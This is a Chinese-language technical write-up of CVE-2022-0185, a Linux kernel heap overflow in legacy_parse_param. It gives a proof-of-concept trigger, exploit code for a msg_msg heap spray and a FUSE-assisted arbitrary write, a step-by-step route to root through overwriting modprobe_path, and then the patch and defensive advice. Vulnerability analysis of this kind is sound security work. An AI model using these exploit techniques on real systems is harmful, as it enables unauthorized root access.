CVE-2022-0185 Linux内核漏洞分析与利用技术详解<\/h1>

漏洞概述<\/h2>
CVE-2022-0185是Linux内核中的一个堆溢出漏洞，存在于文件系统上下文(fs_context)的legacy_parse_param函数中。该漏洞允许攻击者通过精心构造的fsconfig系统调用参数实现内核堆溢出，结合FUSE(用户空间文件系统)技术可以实现稳定的竞争条件利用，最终获得root权限。<\/p>

技术背景<\/h2>

FUSE技术简介<\/h3>
FUSE(用户空间文件系统)是一种允许非特权用户在用户空间实现文件系统的技术。关键特点包括：<\/p>
通过VFS层将文件系统操作回调到用户空间<\/li>
使用fuse_operations结构体定义各种文件操作的回调函数<\/li>
需要root权限挂载，但之后可由普通用户操作<\/li> <\/ol>
struct<\/span> fuse_operations {
<\/span><\/span>    int<\/span> (*<\/span>getattr) (const<\/span> char<\/span> *<\/span>, struct<\/span> stat *<\/span>);
<\/span><\/span>    int<\/span> (*<\/span>readlink) (const<\/span> char<\/span> *<\/span>, char<\/span> *<\/span>, size_t);
<\/span><\/span>    \/\/ ...其他文件操作回调函数
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>漏洞相关系统调用<\/h3>
漏洞涉及两个关键系统调用：<\/p>

fsopen()<\/code> - 打开文件系统上下文<\/li>
fsconfig()<\/code> - 配置文件系统上下文参数<\/li>
<\/ol>
漏洞分析<\/h2>
漏洞代码<\/h3>
漏洞位于fs\/fs_context.c<\/code>文件的legacy_parse_param<\/code>函数中：<\/p>
static<\/span> int<\/span> legacy_parse_param<\/span>(struct<\/span> fs_context *<\/span>fc, struct<\/span> fs_parameter *<\/span>param)
<\/span><\/span>{
<\/span><\/span>    struct<\/span> legacy_fs_context *<\/span>ctx =<\/span> fc-><\/span>fs_private;
<\/span><\/span>    unsigned<\/span> int<\/span> size =<\/span> ctx-><\/span>data_size;
<\/span><\/span>    size_t len =<\/span> 0<\/span>;
<\/span><\/span>    
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    if<\/span> (len ><\/span> PAGE_SIZE -<\/span> 2<\/span> -<\/span> size)  \/\/ 漏洞点：整数下溢
<\/span><\/span><\/span><\/span>        return<\/span> invalf(fc, "VFS: Legacy: Cumulative options too large"<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    memcpy(ctx-><\/span>legacy_data +<\/span> size, param-><\/span>string, param-><\/span>size); \/\/ 越界写
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理<\/h3>

size<\/code>是无符号整数，当size > PAGE_SIZE - 2<\/code>时，PAGE_SIZE - 2 - size<\/code>会下溢变为极大值<\/li>
绕过长度检查后，memcpy<\/code>可以越界写入内核堆<\/li>
通过反复调用fsconfig<\/code>可以不断扩大越界写入的范围<\/li>
<\/ol>
POC验证<\/h3>
#define _GNU_SOURCE
<\/span><\/span><\/span>#include<\/span> <sys\/syscall.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>#ifndef __NR_fsconfig
<\/span><\/span><\/span>#define __NR_fsconfig 431
<\/span><\/span><\/span>#endif
<\/span><\/span><\/span>#ifndef __NR_fsopen
<\/span><\/span><\/span>#define __NR_fsopen 430
<\/span><\/span><\/span>#endif
<\/span><\/span><\/span><\/span>
<\/span><\/span>#define FSCONFIG_SET_STRING 1
<\/span><\/span><\/span>#define fsopen(name, flags) syscall(__NR_fsopen, name, flags)
<\/span><\/span><\/span>#define fsconfig(fd, cmd, key, value, aux) syscall(__NR_fsconfig, fd, cmd, key, value, aux)
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(void<\/span>)
<\/span><\/span>{
<\/span><\/span>    char<\/span>*<\/span> val =<\/span> "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"<\/span>;
<\/span><\/span>    int<\/span> fd =<\/span> fsopen("ext4"<\/span>, 0<\/span>);
<\/span><\/span>    
<\/span><\/span>    for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> 5000<\/span>; i++<\/span>) {
<\/span><\/span>        fsconfig(fd, FSCONFIG_SET_STRING, "<\/span>\x00<\/span>"<\/span>, val, 0<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用技术<\/h2>
信息泄露(Leak)<\/h3>
利用msg_msg<\/code>结构实现内核地址泄露：<\/p>

喷射多个msg_msg<\/code>结构，使其位于漏洞分配的堆块附近<\/li>
通过越界写修改msg_msg<\/code>的m_ts<\/code>字段扩大消息大小<\/li>
读取被修改的消息获取内核数据<\/li>
<\/ol>
关键代码：<\/p>
uint64_t<\/span> do_leak<\/span>() {
<\/span><\/span>    \/\/ 喷射msg_msg
<\/span><\/span><\/span><\/span>    for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> 8<\/span>; i++<\/span>) {
<\/span><\/span>        memset(buffer, 0x41<\/span>+<\/span>i, sizeof<\/span>(buffer));
<\/span><\/span>        targets[i] =<\/span> make_queue(IPC_PRIVATE, 0666<\/span> |<\/span> IPC_CREAT);
<\/span><\/span>        send_msg(targets[i], message, size -<\/span> 0x30<\/span>, 0<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 触发漏洞修改msg_msg大小
<\/span><\/span><\/span><\/span>    for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> 117<\/span>; i++<\/span>) {
<\/span><\/span>        fsconfig(fd, FSCONFIG_SET_STRING, "<\/span>\x00<\/span>"<\/span>, pat, 0<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 读取泄露的数据
<\/span><\/span><\/span><\/span>    for<\/span> (int<\/span> j =<\/span> 0<\/span>; j <<\/span> 0x10<\/span>; j++<\/span>) {
<\/span><\/span>        get_msg(targets[j], recieved, size, 0<\/span>, IPC_NOWAIT |<\/span> MSG_COPY |<\/span> MSG_NOERROR);
<\/span><\/span>        kbase =<\/span> do_check_leak(recieved);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>任意地址写<\/h3>
结合FUSE技术实现稳定的任意地址写：<\/p>

使用FUSE映射内存区域<\/li>
创建竞争线程触发漏洞修改msg_msg<\/code>的next指针<\/li>
通过FUSE的read回调函数实现可控写入<\/li>
<\/ol>
void<\/span> *<\/span>arb_write<\/span>(void<\/span> *<\/span>args)
<\/span><\/span>{
<\/span><\/span>    uint64_t<\/span> goal =<\/span> modprobe_path -<\/span> 8<\/span>;
<\/span><\/span>    char<\/span> evil[0x20<\/span>];
<\/span><\/span>    memcpy(evil, (void<\/span> *<\/span>)&<\/span>goal, 8<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 触发漏洞修改msg_msg的next指针
<\/span><\/span><\/span><\/span>    fsconfig(fd, FSCONFIG_SET_STRING, "<\/span>\x00<\/span>"<\/span>, pat, 0<\/span>);
<\/span><\/span>    fsconfig(fd, FSCONFIG_SET_STRING, "<\/span>\x00<\/span>"<\/span>, evil, 0<\/span>);
<\/span><\/span>    
<\/span><\/span>    write(fuse_pipes[1<\/span>], "A"<\/span>, 1<\/span>); \/\/ 同步信号
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> evil_read<\/span>(const<\/span> char<\/span> *<\/span>path, char<\/span> *<\/span>buf, size_t size, off_t offset,
<\/span><\/span>              struct<\/span> fuse_file_info *<\/span>fi)
<\/span><\/span>{   
<\/span><\/span>    \/\/ 将modprobe_path修改为可控路径
<\/span><\/span><\/span><\/span>    memcpy((void<\/span> *<\/span>)(evil_buffer +<\/span> 0x1000<\/span>-<\/span>0x30<\/span>), evil, sizeof<\/span>(evil));
<\/span><\/span>    
<\/span><\/span>    \/\/ 等待arb_write线程完成漏洞利用
<\/span><\/span><\/span><\/span>    read(fuse_pipes[0<\/span>], &<\/span>signal, 1<\/span>);
<\/span><\/span>    
<\/span><\/span>    return<\/span> size;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>完整利用步骤<\/h3>

打开ext4文件系统上下文(fsopen<\/code>)<\/li>
喷射msg_msg<\/code>结构布置堆布局<\/li>
触发漏洞泄露内核地址<\/li>
计算modprobe_path<\/code>地址<\/li>
设置FUSE文件系统和管道用于同步<\/li>
创建竞争线程触发任意地址写<\/li>
修改modprobe_path<\/code>指向恶意脚本<\/li>
触发执行恶意脚本获取root权限<\/li>
<\/ol>
补丁分析<\/h2>
修复补丁修改了长度检查逻辑：<\/p>
- if (len > PAGE_SIZE - 2 - size)
<\/span><\/span><\/span><\/span>+ if (size + len + 2 > PAGE_SIZE)
<\/span><\/span><\/span><\/code><\/pre>新检查直接计算总长度，避免了整数下溢问题。<\/p>
防御建议<\/h2>

及时更新内核版本<\/li>
限制非特权用户使用FUSE<\/li>
启用内核堆保护机制如SLAB_HARDENED<\/li>
监控异常的系统调用序列<\/li>
<\/ol>
总结<\/h2>
CVE-2022-0185展示了内核文件系统子系统中的复杂漏洞利用技术，结合了：<\/p>

整数溢出绕过检查<\/li>
堆布局控制<\/li>
竞争条件利用<\/li>
FUSE技术实现稳定利用<\/li>
<\/ul>
这种高级利用技术对内核安全防护提出了新的挑战，需要从代码审计、运行时防护等多方面加强防御。<\/p>